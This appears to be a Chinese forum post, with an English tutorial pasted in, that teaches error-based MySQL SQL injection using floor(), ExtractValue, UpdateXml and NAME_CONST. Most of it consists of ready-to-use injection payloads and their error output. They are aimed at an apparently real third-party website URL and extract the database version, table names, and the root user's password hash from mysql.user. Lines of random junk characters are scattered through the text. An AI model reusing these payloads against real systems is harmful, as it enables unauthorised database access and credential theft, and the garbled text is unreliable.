mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
' k# x/ u, N8 T6 k| id | title | content |
+—-+——-+———+
: |5 C& ]; v. p  o4 a6 G|  1 | test  | do it   |
5 m% B8 i2 c+ l7 Z- h% J+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
* O3 t( x, |- Z8 _+ |3 m4 v( y; c例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
- K- t% X5 Q/ E  M- RERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
% F9 c* W* h# e测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
. X) b$ s4 M+ L, n( n- L, ?
MYSQL高版本报错注入技巧-利用NAME_CONST注入
+ i5 t1 S8 x, cIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
! C/ ]" R1 j3 O! C9 E
) `2 R8 x2 F1 {7 I
" F8 |& j3 |" [' s% V' Z相关信息
( y  N* f* A# e% `* T2 U0 ^3 v+ D
. F8 t2 y) x7 s' J' [4 |+ W3 XNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

3 H! Y3 h. p3 ^  X& K6 m4 _) [Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

" s& r- }. ^9 D7 cSELECT NAME_CONST('TEST', 1)
$ L+ c6 A) z( l4 l0 t+ }


|---------------|
|     TEST      |
' F: W; h7 h' P3 X0 j/ j|               |
|---------------|
$ {& E  v" |; R|       1       |
* J' S( Y  `0 J/ L: E! z' x, u8 i|               |
. g+ @% i* N. Y: k6 o) r|---------------|


8 K- L& U# [; V% [0 j9 w
! G- V# f; M! n  v
: t  D& K: m. {4 zhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
6 p& m' @7 x7 h( `* }0 j
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
& Q& U* R& s' L* O
. @  C+ L. F. X* c) j. _& a8 u
6 i/ I! d3 g' ^! E! X
, a4 ?( b/ @5 A- M1 ^

7 @) Y4 j' I( C9 X! D' iCode:
* c4 C* ^' L9 i) I' Sand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
0 e9 b  F' X- ]8 P& `0 L0 g1 l2 d

VAR = Your MySQL variable.
  h# n# B3 `6 d8 h" {2 h
MySQL 5.1.3 Server System Variables
5 `" K' |( ?3 p: D3 {
Let's try it out on my site..

. c# l& i1 {" vCode:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
  p5 S5 W5 G5 V8 J: Y
Erroruplicate column name '5.0.27-community-nt'

* n. w2 I3 V4 b- U9 P% A5 D0 B3 d
# Q4 K6 j7 j. y7 Y1 f

1 r& P3 v4 P. t6 J' M
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

+ l3 j, D0 W$ r# g! G( HData Extraction

9 W2 k  ^: a. J8 M- [Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

$ J- ]3 p5 j( L8 {: `: s3 s1 U) q
0 J. z  W/ U2 T) c5 i% {1 U- DWe should get a duplicate column 1 error...

Code:
* j! G& t! E0 }# K( x7 y; ghttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
+ U: G4 ^- X  U! u$ J+ a7 t  T: [
# U4 F. W- F: zErroruplicate column name '1

& w2 Y5 \8 }  F4 T4 i7 i& ~! R
+ r; u! S( W, T/ D" d

8 E& j2 n/ [, B' \! D  @6 b! u) w1 c

7 x9 V- \& x7 h/ a% l- I  T8 b4 e; u( RNow let's get the tables out this bitch..

# n: E. g/ h) g  ?! V! fCode:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
7 s9 C% y+ |6 m9 W( Y
- J' i" M& B# f
Let's see if it works here, if it does, we can go on and finish the job.
& b% m; l, ^# h% s  c' n! T
) H. B3 m/ c9 g2 H, H: A& l7 O# |Code:
/ [& `* [+ r6 Yhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
/ a) i' X2 X9 W3 B, V

$ r9 Q4 ?& g% W7 d+ [; o( g3 B* qErroruplicate column name 'com_admanage

# _+ q2 {, X4 k" d' H
9 a/ E' Y3 [6 `& ]' H1 M



Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
" Y" Y1 ~% S! V, G
" S& h; l' S( dLet's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

+ T/ W; x& p4 M$ `% f6 U* R  i9 b5 G
So mine looks like this, and I get the duplicate column name 'Host'.
6 ]  R6 f2 f! z
Code:
, I4 R- E3 a- K: ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Erroruplicate column name 'Host'


2 v0 A3 S, u& E
/ L4 u2 j5 ^0 G/ K8 F+ U


Woot, time to finish this bitch off.
& R+ L% W- O3 X5 r6 G! @7 `
+ {' K" O: {* ~/ G$ Q. @  q# X  wCode:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
8 Z# ~2 R) {' B) H, p* u

So mine looks like this...
8 [# V- v% x, i! p/ r
Code:
& P3 R  d9 i2 g3 X( shttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

% Q! T( \. {  mErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
8 L  q) L& K5 J
5 ^1 P  j% _) _
# A% \, [' a; S+ ^+ L



2 Y3 K2 g' N- fAnd there we have it, thanks for reading.

0 {+ P7 F5 M! ]# e% t/ ~( S/ }" x